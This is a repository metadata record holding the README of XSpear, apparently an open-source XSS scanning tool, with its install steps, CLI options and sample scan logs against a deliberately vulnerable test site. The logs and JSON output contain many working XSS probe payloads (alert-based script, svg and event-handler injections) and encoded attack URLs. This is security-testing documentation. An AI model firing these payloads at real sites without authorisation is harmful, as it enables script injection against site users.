{"id":13542228,"url":"https://github.com/hahwul/XSpear","last_synced_at":"2025-04-02T09:33:28.032Z","repository":{"id":41530264,"uuid":"196596188","full_name":"hahwul/XSpear","owner":"hahwul","description":"🔱 Powerfull XSS Scanning and Parameter analysis tool\u0026gem","archived":false,"fork":false,"pushed_at":"2022-09-27T13:47:33.000Z","size":1121,"stargazers_count":1258,"open_issues_count":21,"forks_count":232,"subscribers_count":45,"default_branch":"master","last_synced_at":"2025-03-30T14:04:16.411Z","etag":null,"topics":["bugbounty","bugbountytips","gem","hacking","library","pentest","ruby","scanner","scanning-xss","selenium","tool","webhacking","xss"],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hahwul.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE.txt","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"custom":["https://paypal.me/hahwul","https://www.buymeacoffee.com/hahwul"]}},"created_at":"2019-07-12T14:46:28.000Z","updated_at":"2025-03-28T19:55:50.000Z","dependencies_parsed_at":"2022-09-10T21:02:48.593Z","dependency_job_id":null,"html_url":"https://github.com/hahwul/XSpear","commit_stats":null,"previous_names":[],"tags_count":14,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2FXSpear/manifests","owner_url":"https://
repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hahwul","download_url":"https://codeload.github.com/hahwul/XSpear/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789288,"owners_count":20834267,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bugbountytips","gem","hacking","library","pentest","ruby","scanner","scanning-xss","selenium","tool","webhacking","xss"],"created_at":"2024-08-01T10:01:03.153Z","updated_at":"2025-04-02T09:33:27.468Z","avatar_url":"https://github.com/hahwul.png","language":"Ruby","funding_links":["https://paypal.me/hahwul","https://www.buymeacoffee.com/hahwul","https://www.paypal.me/hahwul"],"categories":["Ruby","Exploitation","Weapons","Ruby (88)"],"sub_categories":["XSS Injection","Tools"],"readme":"\u003cimg src=\"https://user-images.githubusercontent.com/13212227/62058818-ffcef780-b25c-11e9-9a35-36537efbcca7.png\" width=100%\u003e\n\n# XSpear\nXSpear is XSS Scanner on ruby gems\n\n\u003cimg src=\"https://img.shields.io/github/languages/top/hahwul/xspear?color=red\"\u003e \u003cimg src=\"https://img.shields.io/gem/v/XSpear.svg\"\u003e \u003cimg src=\"https://img.shields.io/gem/dt/XSpear.svg\"\u003e \u003cimg src=\"https://img.shields.io/librariesio/sourcerank/rubygems/Xspear\"\u003e \u003cimg src=\"https://api.codacy.com/project/badge/Grade/0fa0f7cd75e34e7b9800f4fdf147605e\"\u003e \u003cimg src=\"https://img.shields.io/github/license/hahwul/XSpear.svg\"\u003e \u003ca href=\"https://twitter.com/intent/follow?screen_name=hahwul\"\u003e\u003cimg 
src=\"https://img.shields.io/twitter/follow/hahwul?style=flat-square\"\u003e\u003c/a\u003e\n\n## TOC\n- [XSpear](#xspear)\n  * [Key features](#key-features)\n  * [Installation](#installation)\n    + [Dependency gems](#dependency-gems)\n  * [Usage on cli](#usage-on-cli)\n    + [Result types](#result-types)\n    + [Verbose Mode](#verbose-mode)\n    + [Case by Case](#case-by-case)\n    + [Sample log](#sample-log)\n  * [Usage on ruby code](#usage-on-ruby-code)\n  * [Add Scanning Module](#add-scanning-module)\n  * [Update](#update)\n  * [Development](#development)\n  * [Contributing](#contributing)\n  * [Donate](#donate)\n  * [License](#license)\n  * [Code of Conduct](#code-of-conduct)\n  * [ScreenShot](#screenshot)\n  * [Video](#video)\n\n## Key features\n- Pattern matching based XSS scanning\n- Detect `alert` `confirm` `prompt` events in a headless browser (with Selenium)\n- Testing request/response for XSS protection bypass and reflected (or all) params\u003cbr\u003e\n  + Reflected params\n  + All params (for blind XSS and anything else)\n  + Filter tests for `event handler` `HTML tag` `Special Char` `Useful code`\n  + Testing your own custom payloads\n- Testing Blind XSS (with XSS Hunter, ezXSS, HBXSS, or any other URL-based blind XSS service)\n- Dynamic/Static Analysis\n  + Find SQL error patterns\n  + Analyze security headers (`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. 
)\n  + Analyze other headers (Server version, Content-Type, etc...)\n  + XSS testing of the URI path\n  + Parameter analysis only (aka no-XSS mode)\n- Scanning from a raw request file (Burp Suite, ZAP request)\n- Running XSpear from Ruby code (as a gem library)\n- Show `table base cli-report`, `filtered rule` and `testing raw query` (url)\n- Testing at selected parameters\n- Support output format `cli` `json` `html`\n  + cli\n  + json\n  + html\n- Support verbose level (0~3)\n  + 0: quiet mode (only result)\n  + 1: show scanning status (default)\n  + 2: show scanning logs\n  + 3: show detail log (req/res)\n- Support custom callback code to test various attack vectors\n- Support config file\n\n## Installation\n\nInstall it yourself as:\n\n    $ gem install XSpear\n\nOr install from a local gem file (download the [latest](https://github.com/hahwul/XSpear/releases/latest) release):\n\n    $ gem install XSpear-{version}.gem\n\nAdd this line to your application's Gemfile:\n\n```ruby\ngem 'XSpear'\n```\n\nAnd then execute:\n\n    $ bundle\n\n### Dependency gems\n`colorize` `selenium-webdriver` `terminal-table` `progress_bar`\u003cbr\u003e\nIf the gem was configured to install these automatically but behaves abnormally, install them with the following commands.\n\n```\n$ gem install colorize\n$ gem install selenium-webdriver\n$ gem install terminal-table\n$ gem install progress_bar\n```\n\n## Usage on cli\n\n```\nUsage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a \n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2\n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json\n\n[ Options ]\n    -u, --url=target_URL             [required] Target Url\n    -d, --data=POST Body             [optional] POST Method Body data\n    -a, --test-all-params            [optional] test to all params(include not reflected)\n        --no-xss                     [optional] no testing xss, only parameters analysis\n        --headers=HEADERS            [optional] Add HTTP Headers\n        --cookie=COOKIE              [optional] Add Cookie\n        --custom-payload=FILENAME    [optional] Load custom payload json file\n        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)\n    -p, --param=PARAM                [optional] Test paramters\n    -b, --BLIND=URL                  [optional] Add vector of Blind XSS\n                                      + with XSS Hunter, ezXSS, HBXSS, etc...\n                                      + e.g : -b https://hahwul.xss.ht\n    -t, --threads=NUMBER             [optional] thread , default: 10\n    -o, --output=FORMAT              [optional] Output format (cli , json)\n    -c, --config=FILENAME            [optional] Using config.json\n    -v, --verbose=0~3                [optional] Show log depth\n                                      + v=0 : quite mode(only result)\n                                      + v=1 : show scanning status(default)\n                                      + v=2 : show scanning logs\n                                      + v=3 : show detail log(req/res)\n    -h, --help                       Prints this help\n        --version                    Show XSpear version\n        --update                     Show how to update\n\n\n```\n### Result types\n- (I)NFO: Information (e.g. SQL error, filtered rule, reflected params, etc.)\n- (V)ULN: Vulnerable XSS, alert/prompt/confirm confirmed with Selenium\n- (L)OW: Low level issue\n- (M)EDIUM: Medium level issue\n- (H)IGH: High level issue\n\n### Verbose Mode\n**[0] quiet mode (show only result)**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 0\nyou see report\n```\n**[1] show progress bar (default)**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 1\n[*] analysis request..\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for 
reflected 2 param + blind XSS ]\n[*] test query generation is complete. [249 query]\n[*] starting XSS Scanning. [10 threads]\n\n[#######################################] [249/249] [100.00%] [01:05] [00:00] [  3.83/s]\n...\nyou see report\n```\n**[2] show scanning logs**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 2\n[*] analysis request..\n[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]\n[-] [22:42:41] [200/OK] 'STATIC' not reflected\n[-] [22:42:41] [200/OK] 'cat' not reflected \u003cscript\u003ealert(45)\u003c/script\u003e\n[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 2 param + blind XSS ]\n[*] test query generation is complete. [249 query]\n[*] starting XSS Scanning. [10 threads]\n[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]\n[-] [22:42:54] [200/OK] 'cat' not reflected \u003cimg/src onerror=alert(45)\u003e\n[-] [22:42:54] [200/OK] 'cat' not reflected \u003csvg/onload=alert(45)\u003e\n[H] [22:42:54] [200/OK] reflected \u003cscript\u003ealert(45)\u003c/script\u003e[param: cat][reflected XSS Code]\n[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! 
'\"\u003e\u003csvg/onload=alert(45)\u003e[param: cat][triggered \u003csvg/onload=alert(45)\u003e]\n...\nyou see report\n```\n**[3] show scanning detail logs**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" -v 3\n[*] analysis request..\n[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url\n[ Request ]\n{\"accept-encoding\"=\u003e[\"gzip;q=1.0,deflate;q=0.6,identity;q=0.3\"], \"accept\"=\u003e[\"*/*\"], \"user-agent\"=\u003e[\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\"], \"connection\"=\u003e[\"keep-alive\"], \"host\"=\u003e[\"testphp.vulnweb.com\"]}\n[ Response ]\n{\"server\"=\u003e[\"nginx/1.4.1\"], \"date\"=\u003e[\"Sun, 29 Dec 2019 13:53:23 GMT\"], \"content-type\"=\u003e[\"text/html\"], \"transfer-encoding\"=\u003e[\"chunked\"], \"connection\"=\u003e[\"keep-alive\"], \"x-powered-by\"=\u003e[\"PHP/5.3.10-1~lucid+2uwsgi2\"]}\n[-] [22:56:21] [200/OK] 'STATIC' not reflected\n[-] [22:56:21] [200/OK] cat=123rEfe6 in url\n...\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 2 param + blind XSS ]\n[*] test query generation is complete. [249 query]\n[*] starting XSS Scanning. 
[10 threads]\n...\n[ Request ]\n{\"accept-encoding\"=\u003e[\"gzip;q=1.0,deflate;q=0.6,identity;q=0.3\"], \"accept\"=\u003e[\"*/*\"], \"user-agent\"=\u003e[\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\"], \"connection\"=\u003e[\"keep-alive\"], \"host\"=\u003e[\"testphp.vulnweb.com\"]}\n[ Response ]\n{\"server\"=\u003e[\"nginx/1.4.1\"], \"date\"=\u003e[\"Sun, 29 Dec 2019 13:54:36 GMT\"], \"content-type\"=\u003e[\"text/html\"], \"transfer-encoding\"=\u003e[\"chunked\"], \"connection\"=\u003e[\"keep-alive\"], \"x-powered-by\"=\u003e[\"PHP/5.3.10-1~lucid+2uwsgi2\"]}\n[H] [22:57:33] [200/OK] reflected \u003ckeygen autofocus onfocus=alert(45)\u003e[param: cat][reflected onfocus XSS Code]\n...\nyou see report\n```\n### Case by Case\n**Scanning XSS**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -d \"searchFor=yy\"\n```\n\n**Only JSON output**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -d \"searchFor=yy\" -o json -v 0\n```\n\n**Set scanning thread**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -t 30\n```\n\n**Testing at selected parameters**\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\u0026cat=123\u0026ppl=1fhhahwul\" -p cat,test\n```\n\n**Testing at all parameters**\u003cbr\u003e\n(This option is tested with or without reflection.)\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\u0026cat=123\u0026ppl=1fhhahwul\" -a\n```\n\n**Testing Only parameter analysis (aka no-xss mode)**\u003cbr\u003e\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\u0026cat=123\u0026ppl=1fhhahwul\" --no-xss\n```\n\n**Testing blind xss(all params)**\u003cbr\u003e\n(Should be used as much as possible because Blind XSS is everywhere)\u003cbr\u003e\n```\n$ xspear -u \"http://testphp.vulnweb.com/search.php?test=query\" -b \"https://hahwul.xss.ht\" -a\n\n# Set your blind xss host. 
\u003c-b options\u003e\n```\n\n**Testing custom payload**\u003cbr\u003e\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\" --custom-payload=custom_payload.json \n```\nContents of custom_payload.json:\n```json\n[\n  {\n    \"payload\":\"\u003csvg/onload=alert(1)\u003e\",\n    \"callback\":\"P1\",\n    \"descript\":\"blahblah~\"\n  },\n  {\n    \"payload\":\"\u003csvg/onload=alert(1)\u003e\",\n    \"callback\":\"P2\",\n    \"descript\":\"blahblah~\"\n  },\n  {\n    \"payload\":\"\u003c\u003e\",\n    \"callback\":\"P1\",\n    \"descript\":\"blahblah~\"\n  }\n]\n```\n\n**for Pipeline**\u003cbr\u003e\n```\n$ xspear -u {target} -b \"your-blind-xss-host\" -a -v 0 -o json\n\n# -u : target\n# -b : blind XSS callback host\n# -a : test all params (including params that are not reflected)\n# -v : verbose level; 0 prints only the result, no logs\n# -o : output format, json\n```\nResulting JSON data:\n```\n{\n    \"starttime\": \"2019-12-25 00:02:58 +0900\",\n    \"endtime\": \"2019-12-25 00:03:31 +0900\",\n    \"issue_count\": 25,\n    \"issue_list\": [{\n        \"id\": 0,\n        \"type\": \"INFO\",\n        \"issue\": \"DYNAMIC ANALYSIS\",\n        \"method\": \"GET\",\n        \"param\": \"cat\",\n        \"payload\": \"XsPeaR\\\"\",\n        \"description\": \"Found SQL Error Pattern\"\n    }, {\n        \"id\": 1,\n        \"type\": \"INFO\",\n        \"issue\": \"STATIC ANALYSIS\",\n        \"method\": \"GET\",\n        \"param\": \"-\",\n        \"payload\": \"\u003coriginal query\u003e\",\n        \"description\": \"Found Server: nginx/1.4.1\"\n    }, {\n        \"id\": 2,\n        \"type\": \"INFO\",\n        \"issue\": \"STATIC ANALYSIS\",\n        \"method\": \"GET\",\n        \"param\": \"-\",\n        \"payload\": \"\u003coriginal query\u003e\",\n        \"description\": \"Not set HSTS\"\n    }, {\n        \"id\": 3,\n        \"type\": \"INFO\",\n        \"issue\": \"STATIC ANALYSIS\",\n        \"method\": \"GET\",\n        \"param\": \"-\",\n        \"payload\": 
\"\u003coriginal query\u003e\",\n        \"description\": \"Content-Type: text/html\"\n    }, {\n        \"id\": 4,\n        \"type\": \"LOW\",\n        \"issue\": \"STATIC ANALYSIS\",\n        \"method\": \"GET\",\n        \"param\": \"-\",\n        \"payload\": \"\u003coriginal query\u003e\",\n        \"description\": \"Not Set X-Frame-Options\"\n    }, {\n        \"id\": 5,\n        \"type\": \"MIDUM\",\n        \"issue\": \"STATIC ANALYSIS\",\n        \"method\": \"GET\",\n        \"param\": \"-\",\n        \"payload\": \"\u003coriginal query\u003e\",\n        \"description\": \"Not Set CSP\"\n    }, {\n        \"id\": 6,\n        \"type\": \"INFO\",\n        \"issue\": \"REFLECTED\",\n        \"method\": \"GET\",\n        \"param\": \"cat\",\n        \"payload\": \"rEfe6\",\n        \"description\": \"reflected parameter\"\n    }, {\n        \"id\": 7,\n        \"type\": \"INFO\",\n        \"issue\": \"FILERD RULE\",\n        \"method\": \"GET\",\n        \"param\": \"cat\",\n        \"payload\": \"onhwul=64\",\n        \"description\": \"not filtered event handler on{any} pattern\"\n    }\n....\n, {\n        \"id\": 17,\n        \"type\": \"HIGH\",\n        \"issue\": \"XSS\",\n        \"method\": \"GET\",\n        \"param\": \"cat\",\n        \"payload\": \"\u003caudio src onloadstart=alert(45)\u003e\",\n        \"description\": \"reflected HTML5 XSS Code\"\n    }, {\n        \"id\": 18,\n        \"type\": \"HIGH\",\n        \"issue\": \"XSS\",\n        \"method\": \"GET\",\n        \"param\": \"cat\",\n        \"payload\": \"\u003ckeygen autofocus onfocus=alert(45)\u003e\",\n        \"description\": \"reflected onfocus XSS Code\"\n ....\n    }, {\n        \"id\": 24,\n        \"type\": \"HIGH\",\n        \"issue\": \"XSS\",\n        \"method\": \"GET\",\n        \"param\": \"cat\",\n        \"payload\": \"\u003cmarquee onstart=alert(45)\u003e\",\n        \"description\": \"triggered \u003cmarquee onstart=alert(45)\u003e\"\n    }]\n}\n```\n(Items marked as 
`triggered` are actually payloads that work in the browser.)\n\n**XSpear on Burpsuite**\u003cbr\u003e\nhttps://github.com/hahwul/XSpear/tree/master/forBurp\n\netc...\n\n### Sample log\n**Scanning XSS**\n```\nxspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=z\"\n    )  (\n ( /(  )\\ )\n )\\())(()/(          (     )  (\n((_)\\  /(_))`  )    ))\\ ( /(  )(\n__((_)(_))  /(/(   /((_))(_))(()\\\n\\ \\/ // __|((_)_\\ (_)) ((_)_  ((_)\n \u003e  \u003c \\__ \\| '_ \\)/ -_)/ _` || '_|\n/_/\\_\\|___/| .__/ \\___|\\__,_||_|    /\u003e\n           |_|                   \\ /\u003c\n{\\\\\\\\\\\\\\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\\\\\\\\\\\\(0):::\u003c======================-\n                                 / \\\u003c\n                                    \\\u003e       [ v1.4.0 ]\n[*] analysis request..\n[*] used test-reflected-params mode(default)\n[*] creating a test query [for reflected 1 param ]\n[*] test query generation is complete. [251 query]\n[*] starting XSS Scanning. [10 threads]\n...snip...\n[*] finish scan. the report is being generated..\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n|                                                            [ XSpear report ]                                                            |\n|                              http://testphp.vulnweb.com/listproducts.php?cat=123\u0026zfdfasdf=124fff... (snip)                              |\n|                                 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues.                                  
|\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n| NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                                | DESCRIPTION                                   |\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n| 0  | INFO  | STATIC ANALYSIS  | GET    | -     | \u003coriginal query\u003e                       | Found Server: nginx/1.4.1                     |\n| 1  | INFO  | STATIC ANALYSIS  | GET    | -     | \u003coriginal query\u003e                       | Not set HSTS                                  |\n| 2  | INFO  | STATIC ANALYSIS  | GET    | -     | \u003coriginal query\u003e                       | Content-Type: text/html                       |\n| 3  | LOW   | STATIC ANALYSIS  | GET    | -     | \u003coriginal query\u003e                       | Not Set X-Frame-Options                       |\n| 4  | MIDUM | STATIC ANALYSIS  | GET    | -     | \u003coriginal query\u003e                       | Not Set CSP                                   |\n| 5  | INFO  | DYNAMIC ANALYSIS | GET    | cat   | XsPeaR\"                                | Found SQL Error Pattern                       |\n| 6  | INFO  | REFLECTED        | GET    | cat   | rEfe6                                  | reflected parameter                           |\n| 7  | INFO  | FILERD RULE      | GET    | cat   | onhwul=64                              | not filtered event handler on{any} pattern    |\n| 8  | HIGH  | XSS              | GET    | cat   | \u003cscript\u003ealert(45)\u003c/script\u003e             | reflected XSS Code                            |\n| 9  | HIGH  | XSS              | GET    | cat   | \u003cmarquee onstart=alert(45)\u003e            | reflected HTML5 XSS Code                      |\n| 10 | HIGH  | XSS              | GET    | cat   | 
\u003cdetails/open/ontoggle=\"alert`45`\"\u003e    | reflected HTML5 XSS Code                      |\n| 11 | HIGH  | XSS              | GET    | cat   | \u003cselect autofocus onfocus=alert(45)\u003e   | reflected onfocus XSS Code                    |\n| 12 | HIGH  | XSS              | GET    | cat   | \u003cinput autofocus onfocus=alert(45)\u003e    | reflected onfocus XSS Code                    |\n| 13 | HIGH  | XSS              | GET    | cat   | \u003ctextarea autofocus onfocus=alert(45)\u003e | reflected onfocus XSS Code                    |\n| 14 | HIGH  | XSS              | GET    | cat   | \u003caudio src onloadstart=alert(45)\u003e      | reflected HTML5 XSS Code                      |\n| 15 | HIGH  | XSS              | GET    | cat   | \u003cmeter onmouseover=alert(45)\u003e0\u003c/meter\u003e | reflected HTML5 XSS Code                      |\n| 16 | HIGH  | XSS              | GET    | cat   | \"\u003e\u003ciframe/src=JavaScriPt:alert(45)\u003e    | reflected XSS Code                            |\n| 17 | HIGH  | XSS              | GET    | cat   | \u003cvideo/poster/onerror=alert(45)\u003e       | reflected HTML5 XSS Code                      |\n| 18 | HIGH  | XSS              | GET    | cat   | \u003ckeygen autofocus onfocus=alert(45)\u003e   | reflected onfocus XSS Code                    |\n| 19 | VULN  | XSS              | GET    | cat   | \u003cscript\u003ealert(45)\u003c/script\u003e             | triggered \u003cscript\u003ealert(45)\u003c/script\u003e          |\n| 20 | HIGH  | XSS              | GET    | cat   | \u003cmarquee onstart=alert(45)\u003e            | triggered \u003cmarquee onstart=alert(45)\u003e         |\n| 21 | HIGH  | XSS              | GET    | cat   | \u003cdetails/open/ontoggle=\"alert(45)\"\u003e    | triggered \u003cdetails/open/ontoggle=\"alert(45)\"\u003e |\n| 22 | HIGH  | XSS              | GET    | cat   | \u003caudio src onloadstart=alert(45)\u003e      | triggered \u003caudio src onloadstart=alert(45)\u003e   |\n| 23 
| VULN  | XSS              | GET    | cat   | '\"\u003e\u003csvg/onload=alert(45)\u003e              | triggered \u003csvg/onload=alert(45)\u003e              |\n+----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+\n\u003c Available Objects \u003e\n[cat] param\n + Available Special Char: ` ( \\ ' { ) } [ : $ ]\n + Available Event Handler: \"onBeforeEditFocus\",\"onAbort\",\"onActivate\",\"onAfterUpdate\",\"onBeforeCopy\",\"onAfterPrint\",\"onBeforeActivate\",\"onBeforeCut\",\"onBeforeDeactivate\",\"onChange\",\"onBeforePrint\",\"onBounce\",\"onBeforeUnload\",\"onCellChange\",\"onBeforePaste\",\"onClick\",\"onBegin\",\"onBlur\",\"onBeforeUpdate\",\"onDataSetChanged\",\"onCut\",\"onDblClick\",\"onCopy\",\"onContextMenu\",\"onDataSetComplete\",\"onDeactivate\",\"onDataAvailable\",\"onControlSelect\",\"onDrag\",\"onDrop\",\"onDragEnd\",\"onEnd\",\"onDragLeave\",\"onDragStart\",\"onDragOver\",\"onDragEnter\",\"onDragDrop\",\"onError\",\"onErrorUpdate\",\"onFinish\",\"onFilterChange\",\"onKeyPress\",\"onHelp\",\"onFocus\",\"onInput\",\"onHashChange\",\"onKeyDown\",\"onFocusIn\",\"onFocusOut\",\"onMessage\",\"onMouseDown\",\"onLoad\",\"onLayoutComplete\",\"onMouseEnter\",\"onLoseCapture\",\"onloadstart\",\"onMediaError\",\"onKeyUp\",\"onMediaComplete\",\"onMouseOver\",\"onMouseWheel\",\"onMove\",\"onMouseMove\",\"onMouseOut\",\"onOffline\",\"onMoveStart\",\"onMouseLeave\",\"onMouseUp\",\"onMoveEnd\",\"onPropertyChange\",\"onOnline\",\"onPause\",\"onPaste\",\"onReadyStateChange\",\"onRedo\",\"onProgress\",\"onPopState\",\"onOutOfSync\",\"onRepeat\",\"onResume\",\"onRowExit\",\"onReset\",\"onResizeEnd\",\"onRowsEnter\",\"onResizeStart\",\"onReverse\",\"onRowDelete\",\"onRowInserted\",\"onResize\",\"onStop\",\"onSeek\",\"onSelect\",\"onSubmit\",\"onStorage\",\"onStart\",\"onScroll\",\"onSelectionChange\",\"onSyncRestored\",\"onSelectStart\",\"onUnload\",\"ontouchstart\",\"onbeforescriptexec
ute\",\"onTimeError\",\"onURLFlip\",\"ontouchmove\",\"ontouchend\",\"onTrackChange\",\"onUndo\",\"onafterscriptexecute\",\"onpointermove\",\"onpointerleave\",\"onpointerup\",\"onpointerover\",\"onpointerdown\",\"onpointerenter\",\"onloadstart\",\"onloadend\",\"onpointerout\"\n + Available HTML Tag: \"script\",\"img\",\"embed\",\"video\",\"audio\",\"meta\",\"style\",\"frame\",\"iframe\",\"svg\",\"object\",\"frameset\",\"applet\"\n + Available Useful Code: \"document.cookie\",\"document.location\",\"window.location\"\n\n\u003c Raw Query \u003e\n[0] http://testphp.vulnweb.com/listproducts.php?-\n..snip..\n[19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E\u0026zfdfasdf=124fffff\n[20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E\u0026zfdfasdf=124fffff\n[21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E\u0026zfdfasdf=124fffff\n[22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E\u0026zfdfasdf=124fffff\n[23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E\u0026zfdfasdf=124fffff\n\n...snip...\n```            \n\n**to JSON**\n```\n$ xspear -u \"http://testphp.vulnweb.com/listproducts.php?cat=123\u0026zfdfasdf=124fffff\" -v 1 -o json\n{\"starttime\":\"2019-08-14 23:58:12 +0900\",\"endtime\":\"2019-08-14 23:58:44 +0900\",\"issue_count\":24,\"issue_list\":[{\"id\":0,\"type\":\"INFO\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Found Server: nginx/1.4.1\"},{\"id\":1,\"type\":\"INFO\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Not set HSTS\"},{\"id\":2,\"type\":\"INFO\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal 
query\u003e\",\"description\":\"Content-Type: text/html\"},{\"id\":3,\"type\":\"LOW\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Not Set X-Frame-Options\"},{\"id\":4,\"type\":\"MIDUM\",\"issue\":\"STATIC ANALYSIS\",\"method\":\"GET\",\"param\":\"-\",\"payload\":\"\u003coriginal query\u003e\",\"description\":\"Not Set CSP\"},{\"id\":5,\"type\":\"INFO\",\"issue\":\"DYNAMIC ANALYSIS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"XsPeaR\\\"\",\"description\":\"Found SQL Error Pattern\"},{\"id\":6,\"type\":\"INFO\",\"issue\":\"REFLECTED\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"rEfe6\",\"description\":\"reflected parameter\"},{\"id\":7,\"type\":\"INFO\",\"issue\":\"FILERD RULE\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"onhwul=64\",\"description\":\"not filtered event handler on{any} pattern\"},{\"id\":8,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cscript\u003ealert(45)\u003c/script\u003e\",\"description\":\"reflected XSS Code\"},{\"id\":9,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003ctextarea autofocus onfocus=alert(45)\u003e\",\"description\":\"reflected onfocus XSS Code\"},{\"id\":10,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cvideo/poster/onerror=alert(45)\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":11,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003caudio src onloadstart=alert(45)\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":12,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cdetails/open/ontoggle=\\\"alert`45`\\\"\u003e\",\"description\":\"reflected HTML5 XSS Code\"},{\"id\":13,\"type\":\"HIGH\",\"issue\":\"XSS\",\"method\":\"GET\",\"param\":\"cat\",\"payload\":\"\u003cselect autofocus 
